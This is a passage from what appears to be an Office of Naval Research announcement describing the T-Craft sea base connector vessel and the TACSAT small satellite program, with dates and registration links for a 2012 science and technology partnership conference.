Sea Base Enablers: The Transformable Craft (T-Craft) – one example of a Sea Base Enabler – is a vessel which can operate in multiple modes. It can self-deploy from an intermediate support base to the sea base and then be used as a high-speed connector from the sea base to the shore. It can transport wheeled and tracked vehicles and other heavy cargo through the surf zone and onto the beach, where it can discharge its cargo without the need for a port.
Tactical Satellite (TACSAT): With the Tactical Satellite (TACSAT), ONR is issuing in a new era of small, responsive and flexible satellites. the TACSAT program will demonstrate communication relay, electronic intelligence and maritime domain awareness capabilities – all of which will enable tactical radios to communicate theatre-wide and facilitate effective command and control of distributed assets.
TACSAT
Credit: ONR
A full agenda for the conference, which runs from Oct. 22-24, is available online athttp://www.onr.navy.mil/Conference-Event-ONR/science-technology-partnership/2012-partnership-conference-agenda.aspx.Register for the event at http://www.onr.navy.mil/Conference-Event-ONR/science-technology-partnership.aspx or visit ONR’s Facebook and Twitter pages regularly for updates.